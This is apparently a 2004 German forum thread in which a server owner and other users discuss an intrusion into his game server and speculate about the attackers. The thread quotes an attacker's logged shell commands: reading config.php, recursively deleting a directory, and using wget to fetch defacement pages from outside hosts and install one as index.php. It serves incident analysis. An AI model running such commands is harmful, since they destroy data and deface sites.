Server gehacked - Seite 3

Dumdideldum · 03.12.2004, 15:18

Zitat:

Original geschrieben von Sloter
Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine.

Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.

Meinst du jetzt den Server vom Angreifer ?
Wenn ja, her mit den Verzeichnissen. Ein Ratespiel ist schon heftig.

Zitat:

@dumdideldum
Feigling, es genügen ein paar Wörter.
Ahmed dankt ServerPlanet für die Unterstützung im Kampf gegen den Imperialismus

Sloter

frazzz · 03.12.2004, 15:25

endlich mal ein sehr interessanter thread

btw: wenn der angreifer schon seine tools anbietet, so nutze sie doch

Sloter · 03.12.2004, 15:34

@frazzz
Die Tools und Scripten findest du leicht im Netz.

@dumdideldum
Ich kann dir keine Anleitung geben, das wäre nicht legal ;-)

Du hast doch einen wget in deinen Logs.
Laß das wget weg und gib das ganze in den Browser ein, ohne abschließenden Dateiangabe.
http://www.domain.com/verzeichnis/

Sloter

frazzz · 03.12.2004, 15:35

Zitat:

Original geschrieben von Sloter
@frazzz
Die Tools und Scripten findest du leicht im Netz.

Zitat:

Original geschrieben von Sloter
Schau dich um auf der Maschine, man findet sehr leicht das Verzeichnis mit der Software.

was jetzt?

Dumdideldum · 03.12.2004, 15:49

@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus

Zitat:

ls
cat config.php
ls
rm -R -f sigs
ls
wget www.ghosn.org/shk2.html
ls
pico shk2.html
cat shk2.html
wget http://willysbirthday.com/hacked.html
wget http://willysbirthday.com/images/boxoesx.gif
mv hacked.html index.php
mkdir images
mv boxoesx.gif /images
mv boxoesx.gif images/
wget www.ghosn.org/shk2.swf
ls

Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

frazzz · 03.12.2004, 15:57

Zitat:

Original geschrieben von Dumdideldum
@sloter:
Ich weiß noch immer nicht, welchen Server du genau meinst, pm

Nach erneuter Dursicht der Logs bin ich mir nicht mehr so sicher, ob dies ernst zu nehmende Hacker waren.
Sieht viel mehr nach l33t h4xx0r aus

Das ein Auszug aus den Befehlen, die sie getätigt haben.
Eben zwei bringen mich zur Annahme, dass eher dodln am Werk waren:
1) pico shk2.html
Seit wann ist es möglich, pico über einen Browser zu bedienen ?
2) cp boxoesx.gif /images
Hamma vergessen dass man nicht im / ist?

der srv, dessen ip du in deinen logs findest

denk ich auch, das es kiddies waren.
ernstzunehmen, ja. immerhin konnten sie eindringen, also passt was nicht.

Dumdideldum · 03.12.2004, 16:07

Zitat:

Original geschrieben von frazzz
der srv, dessen ip du in deinen logs findest

huh ?
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

Insofern bringt mir http Nüsse.

frazzz · 03.12.2004, 16:10

Zitat:

Original geschrieben von Dumdideldum
Das ist kein WWW server, sondern, wie bereits geschrieben, ein gameserver.

ist doch egal, wozu der server dient(e)
du findest ein verzeichnis mit der hackersoftware

Zitat:

Original geschrieben von Sloter

Wenn du dich auf der Maschine vom Angreifer umsiehst, findest du ein verzeichnis mit allmöglichen Hackertools und Scripten die Exploits ausnützen.

Philipp · 03.12.2004, 17:15

Zitat:

Original geschrieben von Sloter
Nö, Server wurde nicht vom Netz genommen.
Leider finde ich die Mails nicht mehr, Imho war es sogar die selbe Maschine.

Es ist sehr unwahrscheinlich das es die gleiche Machine ist. The Planet ist ein relativ grosser Provider mit mehreren Rechenzentren und tausenden von Servern.

Das dort monatelang der gleiche Server als Hackmachine verwendet wird, kann ich mir irgendwie nicht vorstellen. Ich kenne The Planet wirklich sehr sehr gut...

http://uptime.netcraft.com/up/graph?...majorgeeks.com
http://uptime.netcraft.com/up/graph?...majorgeeks.com
http://uptime.netcraft.com/up/graph?...majorgeeks.com

Der zweite Total Control Server wird in Kürze bestellt und ersetzt meine derzeitige Dual Xeon Machine bei EV1/Rackshack

Sloter · 03.12.2004, 19:48

Ich guck Morgen nocheinmal nach in meinem Mailarchiv.
Ich kann mich nur auf die Domain erinnern willysbirthday.com.

Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert.
Das anbieten von Tools und Scripten ist nichts verwerfliches und wo bitte soll Österreich sein?

Wir werden ja sehen, wie lange die Maschine von der Dumdideldum angegriffen wurde, online ist.
Bis jetzt schaut es nicht danach aus, als würde sie offline gehen.

Sloter

03.12.2004, 15:25	#22
frazzz Inventar Registriert seit: 11.01.2003 Beiträge: 5.292	endlich mal ein sehr interessanter thread btw: wenn der angreifer schon seine tools anbietet, so nutze sie doch ____________________________________ pssst tanj

03.12.2004, 15:34	#23
Sloter Inventar Registriert seit: 05.01.2000 Beiträge: 3.812	@frazzz Die Tools und Scripten findest du leicht im Netz. @dumdideldum Ich kann dir keine Anleitung geben, das wäre nicht legal ;-) Du hast doch einen wget in deinen Logs. Laß das wget weg und gib das ganze in den Browser ein, ohne abschließenden Dateiangabe. http://www.domain.com/verzeichnis/ Sloter

03.12.2004, 19:48	#30
Sloter Inventar Registriert seit: 05.01.2000 Beiträge: 3.812	Ich guck Morgen nocheinmal nach in meinem Mailarchiv. Ich kann mich nur auf die Domain erinnern willysbirthday.com. Ich kann mir aber schon vorstellen das es die Burschen von ThePlanet nicht sonderlich interressiert. Das anbieten von Tools und Scripten ist nichts verwerfliches und wo bitte soll Österreich sein? Wir werden ja sehen, wie lange die Maschine von der Dumdideldum angegriffen wurde, online ist. Bis jetzt schaut es nicht danach aus, als würde sie offline gehen. Sloter

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)